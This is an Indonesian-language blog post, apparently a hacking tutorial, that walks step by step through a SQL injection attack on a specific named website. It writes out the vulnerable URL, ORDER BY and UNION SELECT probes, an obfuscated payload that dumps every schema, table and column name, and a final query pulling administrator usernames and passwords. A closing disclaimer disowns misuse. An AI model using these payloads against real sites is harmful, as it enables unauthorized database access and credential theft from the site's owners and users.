okay mungkin ini sudah banyak yang tau, tapi apa salah nya sedikit sharing, hehehhe
target : http://abslatin.co.uk/node.php?id=16'
ada vurl sqli, kita tes yah
kita gunakan order by -- sampai ketemu error nya, contoh
abslatin.co.uk/node.php?id=16 order by 5--
wuihh kita lanjutkan
kemudian kita ketikkan
http://abslatin.co.uk/node.php?id=16 union all select 1,2,3,4--
maka muncul lah angka ajaib nya, disini saya dapatkan angka ajaib nya 4
nah sekarang langsung ke versi cepat nya, kalo mau cek versi nya silahkan
versi cepat sesuai petunjuk mbah google :P
http://abslatin.co.uk/node.php?id=16 union all select 1,2,3,(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where(table_sche
ma!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2f,table_n
ame,0x2f,column_name))))x)--
ada tulisan admin dan bla bla
lanjut dah
http://abslatin.co.uk/node.php?id=16 union all select 1,2,3,concat(user_name,0x3a,user_password,0x3a,id) from administrators--
uppsss selesai
penulis tidak bertanggung jawab ya apabila di salah gunakan
gue suka gaya loe
BalasHapus